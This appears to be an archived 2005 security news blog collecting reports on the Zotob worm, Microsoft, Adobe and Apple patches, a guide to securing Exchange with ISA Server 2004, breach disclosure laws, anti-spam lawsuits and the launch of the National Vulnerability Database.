Sunday, August 21, 2005

Experts divided on Microsoft worm threat

Security experts are divided over the effects of the latest rash of worms that exploit a vulnerability in Microsoft's Plug-and-Play software.

There have been 10 malware programs detected that exploit the vulnerability so far. These have caused problems for large corporates and individuals worldwide but Kaspersky, one of the first antivirus vendors to detect the new malware, insists that there is little to worry about.

"There has not been any noticeable increase in network activity that could be ascribed to this worm," said the company in a statement.

"During the Sasser epidemic in May 2004, Sasser caused an increase in network traffic of approximately 20 to 40 per cent. At the moment, there are no signs of a similar increase. This would seem to confirm that, at the moment, there is no epidemic."

But Kaspersky is something of a lone voice calling for calm.

"The Zotob Worm is being underestimated," said network security specialist Arbor Networks.

“We have received calls from a number of large companies that have been devastated by Zotob. Because there have been additional variants of the worm released and the most recent one is through email, this has the potential to become a much bigger problem for companies."

A patch to secure PCs against the new malware has been available from Microsoft since August 9.

Adobe warns over PDF peril

Adobe has issued updates to guard against a buffer overflow vulnerability in various versions of its popular Acrobat and Reader software packages. The security bug, which stems from an unspecified boundary error in the core application plug-in, might be used to inject hostile code into vulnerable systems by tricking potential victims into opening a maliciously constructed PDF file.
"If the vulnerability were successfully exploited, the application could crash with an increased risk of arbitrary code execution," Adobe warns. Security clearing house Secunia describes the software flaw as critical. Adobe Reader users on Windows or Mac OS are advised to upgrade to version 7.0.3 or 6.0.4. Acrobat users on Windows or Mac OS are urged to adopt version 7.0.3, 6.0.4 or 5.0.10. Linux or Solaris users of Adobe Reader should step up to version 7.0.1.®

Exploit for unpatched IE vuln fuels hacker fears

Microsoft is investigating an IE security bug amid fears that a hacker attack based on the vulnerability is imminent. A flaw in Microsoft DDS Library Shape Control COM object (msdds.dll) is at the centre of the security flap.
Security researchers warn that msdss.dll might be called from a webpage loaded by Internet Explorer and crash in such a way that allows hackers to inject potentially hostile code into vulnerable systems. That's because IE attempts to load COM objects found on a web page as ActiveX controls, as is the case with msdds.dll. A programming object is not supposed to be used in this way. So hackers might be able to take control of systems by tricking users into visiting a maliciously constructed web site. US-CERT warns that exploit code to do this is already available but Microsoft said it's not aware of any attacks.

No patch is available but Microsoft has posted a bulletin detailing possible workarounds. These include disabling ActiveX controls, setting the kill bit for msdds.dll and unregistering msdds.dll. Use of an alternative browser (such as Firefox, Opera) is also an option.

Msdds.dll is a .NET component not loaded onto Windows by default. But the COM object is reportedly installed as part of the following products: Microsoft Office XP, Microsoft Visual Studio .NET 2002, Microsoft Visual Studio .NET 2003 and Microsoft Office Professional 2003. That means there'll be a large number of potentially vulnerable systems.

The SANS Institute's Internet Storm Centre has upped its alert status to yellow because of concerns that "widespread malicious use of this vulnerability is imminent". The vulnerability was publicly disclosed by FrSIRT based on information it received from an anonymous source. Microsoft has criticised the "irresponsible" way the vulnerability came to light. ®

Tuesday, August 16, 2005

IRC bot latches onto Plug-and-Play vuln

The Microsoft Plug-and-Play vulnerability exploited by the ZoTob worm has been harnessed to create an IRC bot. IRCBot-ES uses the vulnerability to spread instead of more common vectors such as Windows RPC security vulns.
The attack provides evidence that virus writers are swarming around the vulnerability - which was only disclosed last week - thinking up new ways to attack vulnerable systems. Early indications are that IRCBot-ES may be more potent that ZoTob because it's easily capable of spreading around internal networks once an infected machine is plugged into a Lan. Anti-virus firm F-secure reports that one organisation has suffered widespread infection from IRCBot-ES via this mechanism. Meanwhile a further variant of ZoTob has been discovered.

The clear interest from malware authors in the vulnerability underlines the need for Windows users to get patched up sooner rather than later. ®

Apple patches OS X security flaws

Apple has posted its latest Mac OS X security update, which addresses a number of potential vulnerabilities in the operating system.
Included among the patches are repairs to AppKit which prevent malicious users exploiting buffer overflows with carefully crafted .rtf and .doc files, executing malware stored within those files or allowing the coder to add extra user accounts to the system.

In the Safari web browser, forms presented using the XSL format are now correctly submitted, preventing the data being potentially sent to another web site. Safari is now protected against malicious .rtf and .pdf documents too.

Mail no longer loads remote images when the user tries to print or forward and HTML-formatted message, unless the user allows it to do so in the appropriate preferences setting.

A tweak to Mac OS X's Bluetooth code ensures devices' requirement for an authenticated connection is correctly reported. The HIToolbox human interface API has been patched to prevent the VoiceOver accessibility app from reading out the contents of secure text-entry fields such as passwords.

The LoginWindow app, which handles user logins and accounts, has been fixed to prevent a local user who knows the password for two accounts from being able to log into a third account without knowing the password. PasswordAssistant, Mac OS X's password generator, has been patched to prevent it showing recently generated - and thus potentially used - passwords.

Kerberos has been updated to fix a number of buffer overflow vulnerabilities that could result in denial of service, remote compromise of a KDC or a compromise to the root account. The Directory Services code has been patched to prevent buffer overflows and to block security flaws within the privileged tool dsidentity.

A couple of buffer overflow and "algorithmic complexity attack" vulnerabilities have been patched in the OS' CoreFoundation code.

Apache 2 for Mac OS X Server 10.3.9 has been updated to version 2.0.53m, fixing a number of buffer overflow issues, and the code has been further tweaked to prevent access to Mac OS X's folder-state files and resource forks.

Other tweaks focus on MySQl, openSSL, CUPS, X11, zlib, servermgrd, servermgr_ipfilter, ping, traceroute, QuartzComposerScreenSaver and SquirrelMail. Full details of the patches applied can be found here.

Two separate updates are available, one for Mac OS X 10.4.2 and the other for 10.3.9. Both are further subdivided into client and server versions:

* Mac OS X 10.4.2 client

* Mac OS X 10.4.2 server

* Mac OS X 10.3.9 client

* Mac OS X 10.3.9 server

The updates are also availabe through Software Update. ®

Monday, August 15, 2005

Worm spreading through Microsoft Plug-and-Play flaw

A worm started spreading on Sunday using a flaw in the Windows operating system's Plug-and-Play functionality, according to two security groups, who advised users to update systems using a patch released by Microsoft five days ago.


“ Zotob is not going to become another Sasser. ... The majority of Windows boxes on the Net won't be hit by (the worm). ”

F-Secure's Virus Labs' blog

The worm, dubbed Zotob by antivirus firm F-Secure, started spreading early Sunday morning, according to a statement posted by the company. The security firm did not post any additional information about the extent of the digital epidemic, however.

F-Secure's researchers do not believe that the worm will widely infect computer systems.

"Zotob is not going to become another Sasser," F-Secure's researchers said on the virus lab's blog. The worm does not infect computers running Windows XP Service Pack 2 nor Windows 2003, as those systems are somewhat protected against the Windows Plug-and-Play vulnerability. Machines that block port 445 using a firewall will also not be vulnerable, the company said. "As a result, the majority of Windows boxes on the Net won't be hit by (the worm)," the blog stated.

The worm is the first major program since the Sasser worm to target a vulnerability in Microsoft Windows computers to spread. The Sasser worm started spreading on April 30, 2004, using a vulnerability in a Windows component known as the Local Security Authority Subsystem Service, or LSASS. While it's unknown how far the worm spread, a week into the outbreak Microsoft said that 1.5 million users had downloaded a cleaning tool for the worm. The Blaster worm had infected about 10 million users, according to Microsoft estimates.

The Zotob worm uses a flaw in Microsoft Windows' Plug-and-Play capabilities, which the software giant had patched five days before, on August 9. The worm compromises systems by sending data on port 445. If a computer is infected with the program, the worm starts a file-transfer protocol (FTP) server and attempts to spread further, according to an analysis by the Internet Storm Center, a group of volunteers who monitor network threats on behalf of the SANS Institute.

The group received reports of the worm as early as 7:30 a.m. EST, according to the ISC's daily diary.

On Friday, the Internet Storm Center upgraded their threat level for the Internet to yellow, because three different groups had published code for taking advantage of the Microsoft Windows' Plug-and-Play flaw to compromise Windows machines. Windows 2000 systems are especially vulnerable to the exploits.

Microsoft's investigation into the worm indicated that it only infects Windows 2000 systems.

"Microsoft’s investigation into this malicious act is ongoing so that we can continue to understand how we can help support customers," the company stated in an advisory posted Sunday. "We are working closely with our anti-virus partners and aiding law enforcement in its investigation."

The company verified that any system patched by its update released last Tuesday will not be infected by the worm.

Sunday, August 14, 2005

Securing Exchange With ISA Server 2004

You might be thinking that running Exchange Server 2003 on the Internet itself is tempting, however you should be concerned with the security issues in doing so -- there are many attacks and automated scripts in the hands of hackers that pound on Exchange machines and attempt to compromise them. Outlook Web Access can be a useful option, however there are security issues with deploying this as well. And the fact remains that sometimes you absolutely need to provide full access for Microsoft Outlook clients, and the Web Access front-end just won't cut it.

This article will highlight the security issues involved with providing Outlook Web Access or full Outlook client connections over the Internet, and then discuss how Microsoft's new ISA Server 2004 can be configured to mitigate these threats. We'll start with Outlook Web Access (OWA) as the simplest solution.

Before we begin, however, please note that this article does not focus on securing the Exchange message transfer agent (MTA) itself, instead we will only look at how to secure remote access to Exchange services from a user's perspective.
Securing Outlook Web Access with ISA 2004
Some of your users might be able to get away with just using Outlook Web Access, the great tool that mimics Outlook's interface in a web browser, in lieu of the traditional Outlook client. OWA is good for Exchange organizations because web browsers are prevalent, affording your users more opportunities to check e-mail while they're away from their desk. As well, the user interface is familiar to your users, so there is very little learning curve involved.

However, there are qualms about Outlook Web Access in regards to security. How might one go about securing it? OWA can use HTTPS [ref 1] -- the secure, tunneled version of the HTTP protocol -- but it lacks any intrusion detection features. More problematically, all versions of OWA but the most recent one do not include a session timeout feature, so clients will remain logged into their OWA session until they click the logout button. Picture an airport Internet kiosk, and your chief financial officer checking his e-mail through OWA. He simply closes the browser when he is finished, but the clever information spy will then re-open the browser after he has walked away, revisit the previous site, and gain access to a very sensitive and important e-mail account. That is certainly a very bad situation, and it's happened before.
The need for ISA 2004
To make OWA secure, there are four things that an administrator, must do:

* Inspect all SSL traffic at the application layer to make sure the traffic is what it claims to be. This prevents a significant portion of today's attacks.
* Maintain wire privacy, as sensitive information is very often transmitted through e-mail.
* You need to enforce the HTTP and HTML standards to make sure that nefarious code doesn't sneak through via weaknesses in these protocols and standards.
* You want to block URL-based attacks by enforcing only known URLs. This protects you against attacks that request unusual actions, have a large number of characters, or are encoded using an alternate character set.

All in all, when you have this quadruple-layered security scenario protecting OWA, you can feel reasonably confident that data trusted to OWA's mechanisms is secure.

Enter ISA Server 2004, which can help you enforce the above requirements. When you put ISA Server in front of your OWA front-end server or servers, there are numerous benefits. The ISA Server in effect becomes the bastion host, terminating all connections with its Web Proxy feature, decrypting HTTPS to inspect the content of the packets transmitted through the machine, enforcing known-URL access with URLScan, and ultimately re-encrypting everything for transmission to the OWA server, living safely behind the ISA frontline machine.
Pre-authentication of connections
ISA 2004 also provides another benefit: pre-authentication of connections. Here's how that works: the ISA Server actually hosts the forms that a user is used to seeing -- such as the login screen. This screen queries the user for her credentials, and once the user enters them into the form, ISA verifies them against Active Directory. Note that RADIUS is also supported, so even ISA machines that do not trust or are not members of a domain can do this pre-authentication. ISA then takes the result of that verification and embeds the credentials into the actual HTTP headers of the packets that it forwards to the front-end OWA server, so the user doesn't get a second prompt. In effect, the ISA server is vetting your users with an actual OWA form, ensuring they are who they say they are, and actually authenticating them at the perimeter of your network, before the packets ever hit the OWA server.
More information on how you would configure this environment is available as a step-by-step document from Microsoft. [ref 2] Tom Shinder also has a great reference for configuring firewall publishing rules to allow external access to OWA sites at ISAServer.org. [ref 3]
Issues with the Outlook Client and VPN
VPN clients, present in all versions of Windows, are the typical choice for anyone needing to provide full Outlook client functionality to users across the Internet. However, VPN security leaves a lot to be desired, at least out of the box: while PPTP can be made secure, doing so requires an extensive knowledge of both the machines running the VPN software (a feat not always possible when you're dealing with your users' home machines) and a deep familiarity with encryption techniques and settings. Of course, there are also logistical hurdles you'll jump through when using a VPN -- they simply won't work in some public locations because of firewalls blocking the needed ports, there are problems with using IPsec and L2TP across the Internet because of packet fragmentation issues, and other issues. And finally, while VPNs are useful tools to connect remote clients to corporate networks, they are less useful for connecting from a corporate network to an application service provider (ASP) that might be running your Exchange servers for you.

So therein lies the problem: how does one provide secure access to an Exchange server for remote users while not making those users jump through hoops to get access to their groupware application? The best answer to this may be to deploy a machine running Microsoft Internet Security and Acceleration Server 2004.
Securing the Outlook client with Exchange 2003 RPC and ISA 2004

The grim reality is that people have grown at best accustomed, and at worst absolutely dependent, on full Outlook client functionality. For example, suppose your corporation has standardized on LookOut, the popular Outlook search plug-in, or perhaps you have a third-party calendaring and agenda plug-in. You might also require the ability to synchronize your mailbox with a handheld PDA-like device, or your users might need Outlook 2003's ability to work seamlessly offline, with full Outlook functionality even when not connected to an Exchange server. Your front-line customer service users may depend heavily on custom functionality offered by client-side rules, or your organization may require its users to take advantage of a standard, business-wide address book.
Security features in Exchange 2003
Exchange 2003 itself has made great strides in this area, enabling new functionality called RPC-over-HTTP. RPC-over-HTTP is a beneficial addition to the product, because it allows RPC requests to be encapsulated in the HTTP protocol, for which most firewalls are already configured and allow access. RPC-over-HTTP depends on an element of Exchange 2003 called the RPC proxy, an ISAPI extension running in IIS (actually on a front-end Outlook Web Access server) that sets up an RPC session after authentication. Essentially, the Outlook client connects to this filter using RPC-over-HTTP, and the filter terminates the "over-HTTP" portion of the connection, takes out the RPC requests, and passes them back to the Exchange server.

However, RPC-over-HTTP isn't a panacea. It only supports basic HTTP authentication, so you need to make sure such the HTTP connection uses SSL. Also, there is no support for SecurID, and the limitation here is two-fold. For one, there is no dialog within Outlook 2003 to ask for the SecurID PIN from the user's device. And secondly, Exchange has no built-in, direct ability to proxy authentication requests to an RSA ACE server and not to Active Directory. RADIUS authentication is also not possible with RPC-over-HTTP, nor is the use of client certificates in most cases. So, while RPC-over-HTTP solves some configuration problems and some legitimate security problems, there remain other issues to address.
ISA 2004 and the Exchange RPC Filter
ISA 2004 comes bundled with the Exchange RPC Filter, which takes the good parts of the RPC Proxy element that is included with the raw Exchange 2003 product to allow RPC-over-HTTP connections, and then marries them with a certain intelligence about how Exchange does its business. The Exchange RPC filter is programmed to know how Exchange RPC connections are established and what the proper format for that protocol is. It also allows only Exchange RPC UUIDs to be transmitted, all the while enforcing client authentication and requiring encryption.

Here's how it works:

* The client connects to the Exchange RPC filter's quasi-portmapper. This piece of the puzzle really isn't a portmapper -- it just acts like one, which reduces the attack surface by only responding to requests for Exchange-based RPC.
* Once the connection is established, the ISA Server returns the filter's Exchange RPC port numbers. Remember, the client is connecting to the filter which then uses the RPC element proxy in Exchange 2003 itself, so the client never directly touches the Exchange server during this stage.
* The client, filled with knowledge about the location of RPC ports, logs onto Exchange. During this process, Exchange refers the logon to Active Directory, which makes the final decision on whether the user is authenticated or not.
* The RPC filter on the ISA Server is monitoring this process the whole time, waiting for the approval from AD that the user is valid. Once it sees that approval, the filter makes sure that the connection is using encryption (if you specify that you want to require it), and then the client sees his mailbox open.

It's also important to note that the entire process just outlined is transparent from the client's perspective. They will see a username and password prompt when they open Outlook and they are away from the corporate network, but once the user enters those credentials, he will see an approximately five second delay and then his mailbox will open. Thus, this solution passes the first litmus test of all security solutions -- make it easy for the user to do things securely.

This solution also protects you from various RPC-based attacks. For example, the ISA RPC filter is immune from reconnaissance attacks and denial of service attacks against the RPC portmapper. All known attacks fail, but even if an attack were successfully able to penetrate the RPC filter, recall that Exchange is still protected since ISA works at the perimeter to vet your connections before they ever touch your Exchange server. This solution is also impervious to service attacks, mainly because such attacks require reconnaissance information that is unavailable. Also, the back end of this RPC filter connection, the ISA to Exchange Server part of the transmission, simply dies if the first part of the connection (the client to the ISA server) isn't correctly positioned or formatted.

How would you go about deploying this solution? Figure 2 shows an example network diagram, with a standalone ISA 2004 machine in the de-militarized zone (DMZ) protecting the back-end Exchange servers and Active Directory. The ISA Server provides the forms-based authentication for OWA that I discussed in the previous section, and also provides secure RPC access for Outlook clients as well.
Conclusion
Deploying Exchange Server 2003 on the Internet to support remote users can be a daunting task. However, Microsoft has supplied logic within ISA Server 2004 that can intelligently protect and defend your Exchange deployment against attacks, both for users of Outlook Web Access and for other users that require RPC-based access for full Outlook client functionality.

The links provides in the Further Reading section can help you with your implementation plan. Additionally, if you are interested in learning more in-depth information about the ISA Server 2004 product itself, I recommend purchasing Tom Shinder's book, ISA Server and Beyond, available from Syngress [ref 5].

Further Reading

[ref 1] "How to publish an SSL Web site by using SSL tunneling in ISA Server 2004" (Microsoft.com)

[ref 2] "How to publish a Microsoft Exchange server for Outlook Web Access in ISA Server 2004" (Microsoft.com)

[ref 3] "Publishing OWA Sites using ISA Firewall Web Publishing Rules (2004)" (ISAServer.org)

[ref 4] "Using ISA Server 2004 with Exchange Server 2003" (Microsoft.com)

[ref 5] Dr. Tom Shinder's book, "ISA Server and Beyond" (Syngress)

NY enacts security breaches disclosure law

New York has enacted an information security breaches law which will oblige firms and local government agencies to notify customers in the state if their personal information is taken or its systems are hacked into.
The legislation is designed to promote a culture of security. It also helps protect consumers by giving them the information they need to head off possible identity theft when sensitive details such as Social Security, driver's license and credit card numbers become exposed. Organisation with customers in New York are obliged to notify these people of a breach as soon as practically possible.

The Information Security Breach and Notification Act in New York is broadly similar to security breaches laws enacted in California more than two years ago. Legislation requiring consumer notification of data security breaches has been approved in at least 15 states since then. Federal security disclosure laws are under consideration but opposed by some who fear it might dilute state laws, Red Herring reports.

New York's decision to press ahead with its legislation follows a series of high profile consumer data security breaches involving US firms including data mining firm ChoicePoint, payment processing firm CardSystems Solutions and others.

"The events of the last few months underscore the urgency of protecting consumers. If a person is not aware that he or she has been a victim of identity theft, then the damage done could be severe and irreversible. Prompt notification gives New Yorkers needed protections," said New York State Assembly member James Brennan, who sponsored the law. "In the last year, over 9,000 New Yorkers were exposed to identity theft because of inadequate security and poor notification procedures." ®

AOL raffles spammer's gold bars

AOL is planning to give away assets seized from spammers in a US sweepstake due to launch Wednesday. A 2003 Hummer H2, $75,000 in cash and $20,000 in gold (pictured here) are up for grabs in a give-away of the illicit gains of junk mailing. It's the second time AOL has given away assets confiscated from a spammer. Last year, AOL raffled a $45,000 Porsche Boxster it seized as part of a settlement against another unnamed junk mail scumbag.
"We think it's justice," says Curtis Lu, AOL deputy general counsel, told USA Today. "We're taking the ill-gotten bounty these spammers have earned off the backs of our customers and handing it back to customers."

AOL obtained the gold, cash and car after suing an unnamed New Hampshire penis pill purveyor using the CAN SPAM Act. AOL sued after receiving hundreds of thousands of complaints from members peaking at 100,000 in one day alone in January 2004.

AOL said the sweepstake illustrated that anti-spam laws are an effective weapon in its spam-fighting arsenal alongside email filtering and other technology countermeasures.

Earlier this week former self-styled 'Spam King' Scott Richter agreed to pay Microsoft $7m to settle an anti-spam lawsuit that had brought him and his company OptInRealBig.com to the edge of bankruptcy. ®

NIST, DHS add national vulnerability database to mix

The National Institute of Standards and Technology and the Department of Homeland Security took the wraps off the National Vulnerability Database this week, but questions still remain whether the federal initiative improves upon existing databases or just adds another choice to the current collections of flaws.

“ It is so important for the world to have multiple vulnerability databases, that I think it is great that there is more than one. You never know if funding will get cutoff or if one goes under, so I think we should always have more than one. ”

Peter Mell, creator of the NVD and senior computer scientist, NIST

The National Vulnerability Database (NVD) is the latest U.S. Department of Homeland Security initiative to boost the preparedness of the nation's Internet and computer infrastructure, as called for by the Bush Administration's National Strategy to Secure Cyberspace. The strategy's incident response initiative, known as the US Computer Emergency Readiness Team (US-CERT), releases some information on serious vulnerabilities, but little or no information on noncritical vulnerabilities, said Peter Mell, a senior computer scientist at NIST and the creator of the NVD.

"My intention was to publish something on everything else," Mell said. "The mission is for every person in the United States to have information on all the vulnerabilities on their computer systems."

The National Vulnerability Database is managed by NIST but funded through the Department of Homeland Security. The group's staff adds 8 new vulnerabilities to the the database each day and keeps a variety of current statistics, including a measure of the workload that the release of such flaws has on network administrators.

The creation of the federal collection of flaws comes as security researchers and companies continue to debate the best way to disclose vulnerability information. In July, Cisco and a former researcher for Internet Security Systems resorted to legal maneuvering after the networking giant took exception to researcher Michael Lynn describing a method to run code on Cisco routers. The same month, networking firm 3Com announced it would start buying information about new vulnerabilities from researchers, a controversial business model that few other organizations have adopted.

The National Vulnerability Database avoids much of the controversy by only including public information in its collection of flaws. The project scans the Common Vulnerability and Exposures (CVE), a listing of serious vulnerabilities maintained by the Mitre Corporation. The NVD expands on the Internet Catalog (ICAT), a previous NIST project, that archived the vulnerabilities defined by the Common Vulnerability and Exposures list.

The CVE definitions are one of the standards that the National Vulnerability Database depends on, said NIST's Mell. The database also uses the Open Vulnerability and Assessment Language (OVAL) to describe the security issues in a standard language, he said.

The reliance on standards gained the effort some plaudits from representatives of security companies that rely on such databases.

"We believe there is a need in the market for an aggregator to bring together all the information from all the different sources," said Gerhard Eschelbeck, chief technology officer of vulnerability assessment service Qualys. "But we want the organizations to use all the open standards."

Another emerging standard for rating the severity of flaws, known as the Common Vulnerability Scoring System (CVSS), should also be used, Eschelbeck said. Researchers from Qualys, Cisco and Symantec--the owner of SecurityFocus--initially developed the standard, which is now managed by the Forum of Incident Response and Security Teams (FIRST).

While the National Vulnerability Database does not yet use the system, Mell has already contacted US-CERT about adopting the system.

"At US-CERT, they are very interested," he said. "They are actually having a meeting to discuss the CVSS soon."

However, adherence to the one of the standards, CVE, is not necessarily a plus, said Brian Martin, content manager for the Open-Source Vulnerability Database (OSVDB).

"If a vulnerability is discovered and not in the CVE database, NVD will not contain it either," Martin said. "While CVE is getting a lot better at looking to alternative sources for vulnerability information, they may still miss stuff."

The OSVDB team's goal is to be a comprehensive resource for vulnerability information, he said.

"Even with our very limited volunteer staff and inability to fully keep up with influx of new vulnerabilities, what we lack in thoroughness at this time we make up for in services and diversity," Martin said. "One point that OSVDB has been harping on for the last two years is that it's almost twenty years (after the first database) and the databases are still not evolving," Martin said.

SecurityFocus also maintains a database of vulnerabilities based, among other sources, its Bugtraq security mailing list. Other security companies maintain their own private databases that they share with customers.

Such databases are not competitors but complimentary to the federal effort, said NIST's Mell. The National Vulnerability Database can respond to the needs of government administrators and create a standard for what should be included in such databases, he said.

"It is so important for the world to have multiple vulnerability databases, that I think it is great that there is more than one," Mell said. "You never know if funding will get cutoff or if one goes under, so I think we should always have more than one."

Six patches - three critical - in MS August patch batch

Microsoft's patch bandwagon rolled into town yesterday loaded with three critical updates among a total of six security alerts. A cumulative security update for Internet Explorer (MS05-038), a buffer overflow vulnerability in Windows Plug-and-Play (MS05-039) and a security bug in the Print Spooler service (MS05-043) all pose a severe hacker risk and earn Redmond's dreaded critical sobriquet.
Of particular note is a flaw in IE's JPEG image rendering that creates a means for virus writers to infect vulnerable systems simply by tricking users into viewing a malicious constructed image. The same IE mega-patch is also designed to address an error in the way COM objects are launched which could lead to memory corruption problems and a validation error revolving around the interpretation of certain URLs that creates scripting risks.

That's bad enough but the Plug-and-Play vulnerability is arguably even worse. Security vendor eEye notes that the vulnerability with Windows Plug-and-Play is similar to vulnerabilities historically exploited to create worms such as Blaster and Sasser. Security tools vendor ISS is even more stark in its warning.

"This vulnerability is remotely exploitable in the default configuration of Windows 2000, and is present in all modern Windows operating systems. There is a high probability that this vulnerability will be exploited in an automated fashion as part of a worm on Windows 2000," it said.

The three criticals encompass XP, Win 2003 and Win 2000 so just about everyone running Windows will have some patching work to do. Microsoft also re-releasing MS05-023 on Tuesday to reflect the fact that Microsoft Word 2003 Viewer is also affected by a vulnerability rated as critical.

Redmond also issued an "important" security update covering a vulnerability in Windows telephony service that could allow remote code execution (MS05-040). Finally we have two "moderate" bulletins covering a DoS risk involving flaws Window's Remote Desktop Protocol (MS05-041) and bugs in Microsoft's implementation of the Kerberos security protocol (MS05-042).

US CERT has produced a useful overview of these various security vulns here. ®

Cabir mobile worm gives track fans the run around

Phone-mad Finns are coping with a minor outbreak of the Cabir mobile virus at the Athletic's World Championship in Helsinki this week. Cabir, which infects smartphones running Symbian Series 60 using Bluetooth short-range radio communication technology to spread, is flourishing in the packed stadium area. The version of Cabir spreading drains the power of the infected phones as it tries to propagate but is otherwise relatively harmless.
"At most we are speaking about dozens of infections, but during a short period and in one spot this is a huge number," Jarmo Koski, a security official at telecoms firm TeliaSonera, told Reuters.

Prospective victims need to accept a download to get hit by Cabir and security researchers reckon many handsets get infected simply because users get fed up with being prompted to allow a connection. Moving away from an infected phone is an effective defence if a malign connection is attempted in, for example, a bar but is harder to apply when you're in a crowded stadium where perhaps the best approach is to turn off Bluetooth on potentially vulnerable phones.

"This [Cabir spreading] happens easily when you gather tens of thousands of people from all over to world to a very small area. In fact, to some extent the same thing was happening during the Live 8 concerts earlier this summer," said Mikko Hyppönen, director of anti-virus research at Finnish anti-virus firm F-Secure, in a posting on the firm's blog. "We now have staff at the stadium assisting visitors in cleaning out affected phones." ®

Tuesday, August 09, 2005

It's full throttle in the battle against viruses

Richard Brown, team leader at Hewlett-Packard Co.'s laboratory in Bristol, England, is one of the pioneers of a "neighbourhood watch" approach to combatting computer viruses.

About five years ago, in the wake of widespread, nasty infections by the Code Red and Nimda worms, HP Labs began experimenting with new ways to fight computer viruses. One idea was that if all the computers on a business network took small, preventive actions, they could add up to significant overall results.

Traditional antivirus programs look for signatures -- recognizable bits of virus code -- that identify viruses in incoming e-mail or on a computer's hard disk. HP researchers took another tack, aiming to slow the progress of any outbound network traffic that looks like a computer worm or virus trying to spread itself.

The technique, called throttling or traffic shaping, aims not to identify offending programs but to slow their infectious activity across public and business networks. Those experiments are now bearing fruit, and the results are appearing in commercial products aimed at Internet service providers, small and large business servers and even individual PCs.

"In its strongest form, it's just preventing a machine that's infected from infecting anyone else," says Matthew Williamson, an original member of the HP team who is now senior research scientist at Sana Security Inc., in San Mateo, Calif.

Mr. Williamson says the technique of spotting viruses based on a recognizable signature was developed to fight slow-spreading viruses, and isn't a complete solution to today's fast-moving worms. Approaches like throttling that block suspicious behaviour "really are a much more sustainable way of thinking about the arms race."

Throttling basically limits the number of connections that one computer can make to other computers. Throttling might set a limit of one new connection every second, which would have little or no effect on most legitimate programs. A Web browser exchanges many messages with a server as it downloads a Web page, but these are repeat communications with one machine and aren't affected by throttling. The Nimda virus makes up to 400 new connections a second, Mr. Brown says, so throttling slows its spread dramatically.

Throttling does cause outgoing traffic to backup on the infected machine, slowing or stopping legitimate programs' communication, but the virus's self-replicating activities would do that anyway. Meanwhile, this sudden filling up of the outgoing message queue warns that something is amiss, Mr. Brown says, so network security staff can be alerted.

Tom Copeland, president of the Canadian Association of Internet Providers (CAIP), says large ISPs were the early adopters and most have installed throttling capabilities. Now it is starting to filter down to products aimed at businesses.

For example, HP has built throttling capability into its ProLiant servers and ProCurve network switches. Mr. Brown says servers are often the first targets of virus attacks, but "there is no technical reason as far as I'm aware" not to implement throttling on client PCs as well.

In fact, Mr. Williamson calls a security feature Microsoft Corp. added to Windows XP last summer, limiting the number of network connections open at one time, a "very weak form of throttling."

Symantec Corp. is applying the same idea to fight spam. Its Security 8100 Series appliance attaches to a corporate network and monitors e-mail traffic. When the device sees large volumes of mail from a single Internet address, it limits the bandwidth allocated to traffic from that address.

This doesn't stop legitimate mail getting through, says Bruce Ernst, group product manager at Symantec, but spammers see outgoing messages backing up on their servers. "Most spammers just start to give up because they can't make their numbers." Mr. Ernst says large companies and ISPs are the major markets for the $4,995 (U.S.) appliance, but didn't say if a version would be made available to smaller organizations.

Dr. Clemens Martin, director of information technology programs at the University of Ontario Institute of Technology in Oshawa, Ont., says he is impressed by the results he has seen from throttling techniques, and the technology "definitely is worthwhile pursuing."

OS exploits are 'old hat'

Analysis - Security issues involving Cisco kit highlighted in Michael Lynn’s presentation at Black Hat are characteristic of networking vendors in general. Cisco is just the most visible of these vendors to target as hackers raise their sights from attacking operating systems towards attacking network infrastructure and database systems, security researchers warn.
According to vulnerability management firm nCircle, virtually all the network vendors tend to run monolithic, closed OSs that are mission-critical for their customers and doesn't lend itself well to the simplistic desktop patching models currently in place. nCircle reckons as Microsoft's security gradually improves hackers will look to others mechanisms of attack - a trend that puts networking equipment in the firing line.

Rooted routers

Timothy Keanini, CTO at nCircle, said that "as Microsoft raises the bar with countermeasures the threat goes elsewhere". Keanini, who attended Lynn’s presentation, said that it built on other research by German hacker FX, into security vulnerabilities with embedded systems such as routers and even printers. Compromised printers could be used to scan for vulnerabilities elsewhere in a network while rooted routers pose an even greater risk.

Cisco controversially slapped a restraining order on Lynn after he gave a talk on security weaknesses with the networking giant's core IOS software at the Black Hat conference in Las Vegas last month. Lynn quit his job at security tools vendor ISS in order to give a presentation about how it might be possible to remotely compromise Cisco routers and run malign code. Cisco said that Lynn had failed to follow approved industry practices in disclosing security vulnerabilities. It also took issue with Lynn's "irresponsible public disclosure of illegally obtained proprietary information".

Database security pitfalls

There's general agreement among security researchers that there's more interest in the digital underground in developing exploits to exploit network security flaws. Such exploits could be used to carry out denial of service attacks but some researchers reckon database systems offer a more lucrative target. Nigel Beighton, Symantec's director of enterprise strategy, EMEA, said that databases are the repository of sensitive corporate information and therefore a natural place to attack. The issue is compounded by a lack of adequate database security technology and infrequent patching schedules, he added.

Roy Hills, technical director at security consultant NTA Monitor, said that it sees a mixture of networking and software patching vulnerabilities when it carries out penetration testing work on behalf of clients. Security bugs in bespoke web application are also a frequent, and growing, source of problems. "Understanding the pitfalls of web application security is not as simple as following a recipe," Hills added. ®

Microsoft quells Vista virus concerns

Microsoft has confirmed that a new scripting tool will not ship as part of the next version of its operating system, Windows Vista. The disclosure dispels concerns that a virus writer had created the first "Vista viruses" by targeting a new interactive shell codenamed Monad (or MSH).
MSH was originally scheduled to be ship with Windows Vista but it is now more likely that MSH's first public release will be as part of the next edition of Microsoft Exchange, due sometime in the second half of 2006. "Monad will not be included in the final version of Windows Vista," said Stephen Toulouse, a program manager in a posting to Microsoft's Security Response Centre's blog. "Monad is being considered for the Windows Operating system platform for the next three to five years. So these potential viruses do not affect Windows Vista or any other version of Windows if 'Monad' has not been installed on the system."

"The viruses do not attempt to exploit a software vulnerability and do not encompass a new method of attack," he added.

The posting ended confusion over Monad's possible inclusion in Vista. Toulouse said that the appearance of proof of concept viruses targeting Monad had nothing to do with its omission from Windows Vista. So that's cleared that up then.

Microsoft's posting follows the online publication of five proof of concept viruses, called Danom, targeting Monad and reckoned to be the work of Austrian VXer Second Part To Hell. These, it's now clear, are not Windows Vista viruses but MSH viruses. ®

Former 'Spam King' pays MS $7m to settle lawsuit

Former 'Spam King' Scott Richter has agreed to pay Microsoft $7m to settle an anti-spam lawsuit. The settlement to a December 2003 lawsuit comes a month after Richter - long ranked one of the world's top three spammers - was removed from the Register of Known Spam Operators maintained by the Spamhaus Project. Richter was dropped from the ROKSO list after his outfit OptInRealBig.com cleaned up its act and stopped sending out junk mail that violated US anti-spam rules.
